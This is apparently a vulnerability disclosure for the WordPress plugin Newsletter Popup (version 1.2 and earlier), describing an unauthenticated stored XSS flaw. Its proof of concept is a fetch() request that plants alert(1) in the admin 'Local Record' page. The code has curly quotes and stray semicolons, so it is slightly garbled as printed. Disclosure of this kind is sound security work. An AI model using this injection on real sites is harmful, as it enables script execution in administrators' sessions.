Newsletter Popup <= 1.2 - Unauthenticated Stored XSS

The plugin does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks

PoC

1. Create a Newsletter popup (any will do) and publish it. 2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly): fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=savenewsletter&nlid;=1&nlname;=Test&nldata;=EMAIL%3Dalert(1)’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error)); 3. Go to the WP-Admin dashboard, and Newsletter Popup -> Local Record, click on Show Record. 4. The alert will trigger successfully.